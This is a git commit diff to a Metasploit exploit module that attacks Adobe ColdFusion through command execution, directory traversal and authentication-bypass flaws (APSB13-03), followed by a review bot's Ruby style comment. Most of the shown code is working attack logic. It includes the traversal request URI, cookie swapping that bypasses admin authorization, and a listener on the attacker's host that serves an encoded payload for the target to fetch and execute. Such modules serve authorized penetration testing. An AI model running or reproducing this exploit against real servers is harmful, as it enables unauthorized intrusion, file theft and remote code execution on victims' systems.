Adding most suggested changes to jhart's adobe module

bug/bundler_fix
Tod Beardsley 2013-04-09 17:55:28 -05:00
parent 522642a65d
commit 90e986860e
1 changed files with 22 additions and 18 deletions


@ -19,23 +19,18 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Adobe ColdFusion APSB13-03',
'Description' => %q{
This module exploits a pile of vulnerabilities in Adobe ColdFusion APSB13-03:
* CVE-2013-0625: arbitrary command execution in scheduleedit.cfm (9.x only)
* CVE-2013-0629: directory traversal
* CVE-2013-0632: authentication bypass
CVE-2013-0625 (arbitrary command execution in scheduleedit.cfm (9.x only)),
CVE-2013-0629 (directory traversal), and CVE-2013-0632 (authentication bypass)
},
'Author' =>
[
'Jon Hart <jon_hart[at]rapid7.com', # Metasploit module
'Jon Hart <jon_hart[at]rapid7.com>', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-0625'],
[ 'CVE', '2013-0629'],
# we don't actually exploit this, as this is the backdoor
# dropped by malware exploiting the other vulnerabilities
[ 'CVE', '2013-0631'],
[ 'CVE', '2013-0632'],
],
'Targets' =>
[
@ -50,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DefaultTarget' => 1,
'Privileged' => true,
'Platform' => [ 'win', 'linux' ],
'Platform' => [ 'win', 'linux', 'unix' ],
'DisclosureDate' => 'Jan 15 2013'))
register_options(
@ -103,7 +98,13 @@ class Metasploit3 < Msf::Exploit::Remote
# if we managed to login, get the listener ready
datastore['URIPATH'] = rand_text_alphanumeric(6)
srv_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}"
if (datastore['SRVHOST'] == "0.0.0.0")
srv_host = Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
srv_port = datastore['SRVPORT'] || 80
srv_uri = "http://#{srv_host}:#{srv_port}"
start_service
# drop a payload on disk which we can used to execute
@ -154,7 +155,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
def on_request_uri cli, request
cf_payload = "test"
case request.uri
when "/#{datastore['URIPATH']}-e"
cf_payload = <<-EOF
@ -165,6 +165,8 @@ class Metasploit3 < Msf::Exploit::Remote
EOF
when "/#{datastore['URIPATH']}-p"
cf_payload = payload.encoded
else
cf_payload = "test"
end
send_response(cli, cf_payload, { 'Content-Type' => 'text/html' })
end
@ -216,9 +218,9 @@ class Metasploit3 < Msf::Exploit::Remote
'connection' => 'TE, close',
'cookie' => build_cookie_header(cookie_hash),
})
cookie_hash.merge! get_useful_cookies res
if res
cookie_hash.merge! get_useful_cookies res
# XXX: I can only seem to get this to work if 'Enable Session Variables'
# is disabled (Server Settings -> Memory Variables)
token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first
@ -541,7 +543,7 @@ class Metasploit3 < Msf::Exploit::Remote
# was just wide open
vuln_without_creds = false
paths.each do |path|
if (traverse_read path, nil) =~ /ADOBE SYSTEMS INCORPORATED/
if traverse_read(path, nil) =~ /ADOBE SYSTEMS INCORPORATED/
vulns += 1
vuln_without_creds = true
break
@ -559,7 +561,7 @@ class Metasploit3 < Msf::Exploit::Remote
vuln_without_bypass = false
paths.each do |path|
cf_cookies = componentutils_login datastore['USERNAME'], datastore['PASSWORD']
if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
if traverse_read(path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
vulns += 1
vuln_without_bypass = true
break
@ -581,7 +583,7 @@ class Metasploit3 < Msf::Exploit::Remote
# and use it for CFAUTHORIZATION_componentutils
cf_cookies['CFAUTHORIZATION_componentutils'] = cf_cookies['CFAUTHORIZATION_cfadmin']
cf_cookies.delete 'CFAUTHORIZATION_cfadmin'
if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
if traverse_read(path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
vulns += 1
vuln_with_bypass = true
break
@ -604,7 +606,7 @@ class Metasploit3 < Msf::Exploit::Remote
# the vulnerability for CVE-2013-0632 is that if RDS is disabled during install but
# subsequently *enabled* after install, the password is unset so we simply must
# check that and only that.
cf_cookies = adminapi_login 'foo', 'bar', true
cf_cookies = adminapi_login Rex::Text.rand_text_alpha(4), Rex::Text.rand_text_alpha(4), true
if cf_cookies.empty?
print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0632"
else
@ -617,7 +619,7 @@ class Metasploit3 < Msf::Exploit::Remote
false
end
def traverse_read path, cookies
def traverse_read(path, cookies)
uri = normalize_uri(target_uri.path)
uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path="
uri << path
@ -628,6 +630,8 @@ class Metasploit3 < Msf::Exploit::Remote
'connection' => 'TE, close',
'cookie' => build_cookie_header(cookies)
})
res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '')
if res and res.body
res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '')
end
end
end
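Review bot: The new guard in the last hunk uses `and` for boolean logic, `if res and res.body`; in Ruby `and` binds lower than assignment and method-call arguments, so the idiomatic form is `&&`, and a guard clause reads better than wrapping the only return value: `return unless res && res.body` followed by the existing `res.body.gsub(...)` line. With the current shape the method returns nil whenever the request fails or has no body, and the three callers in the earlier hunks match that result with `=~`, so the nil return is now part of the method's contract and is worth stating in a comment above the guard, e.g. `# nil when the request failed or returned no body; callers regex-match the result`. The `traverse_read` signature and the request that produces `res` sit above this hunk, so the guard's coverage of other failure modes (a body that is not a String, for instance) cannot be confirmed from here.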